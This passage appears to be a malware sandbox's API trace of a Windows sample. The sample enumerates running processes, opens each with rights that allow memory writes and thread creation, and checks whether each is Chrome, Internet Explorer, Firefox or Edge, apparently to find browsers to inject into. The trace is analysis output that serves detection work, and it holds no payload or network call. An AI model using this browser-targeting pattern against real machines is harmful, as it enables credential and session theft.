	[0241.158] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.159] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x850c
	[0241.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.159] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.160] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.160] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.160] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.161] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.162] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x8510
	[0241.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.163] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.163] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.164] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.165] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.165] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.166] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x8514
	[0241.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.166] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.166] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.167] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.167] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.168] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0241.168] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x8518
	[0241.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.169] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0241.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.169] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.170] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0241.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.170] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.170] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.171] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x851c
	[0241.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.171] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.172] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.172] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.173] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.173] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0241.174] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x8520
	[0241.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.174] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.174] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.175] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.175] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.175] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0241.176] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x8524
	[0241.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.176] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0241.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.188] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.188] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0241.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.189] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.189] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x8528
	[0241.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.190] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.190] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.191] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.191] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.191] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0241.192] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x852c
	[0241.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.193] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0241.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.193] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.194] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0241.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.194] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.194] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0241.195] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8530
	[0241.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.195] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0241.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.196] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.196] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0241.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.196] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.197] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0241.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x8534
	[0241.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.198] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0241.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.198] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.198] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0241.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.199] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.199] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0241.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x8538
	[0241.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.200] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0241.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.200] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.201] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0241.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.201] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.201] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0241.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0241.202] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0241.203] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x853c
	[0241.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.203] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0241.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.204] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.205] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0241.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.205] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.206] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0241.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x8540
	[0241.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.207] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0241.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.207] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.210] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0241.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.210] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.210] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0241.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x8544
	[0241.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.211] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0241.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.212] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.212] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0241.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.212] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.213] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0241.214] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x8548
	[0241.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.214] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0241.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.214] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.215] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0241.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.215] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.215] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0241.216] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x854c
	[0241.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.216] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0241.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.217] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.218] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0241.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.219] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.220] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0241.221] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x8550
	[0241.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.221] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0241.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.221] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.222] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0241.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.222] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.222] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0241.223] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x8554
	[0241.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.223] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0241.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.224] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.224] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0241.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.225] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.225] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0241.226] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x8558
	[0241.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.226] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0241.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.227] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.227] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0241.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.228] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.228] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0241.229] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x855c
	[0241.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.229] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0241.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.230] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.230] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0241.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.230] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.231] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0241.232] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x8560
	[0241.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.232] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0241.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.232] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.232] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0241.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.233] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.233] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0241.234] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x8564
	[0241.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.234] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0241.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.235] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.235] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0241.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.236] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.236] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0241.237] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x8568
	[0241.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.237] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0241.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.238] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.239] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0241.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.239] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.240] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
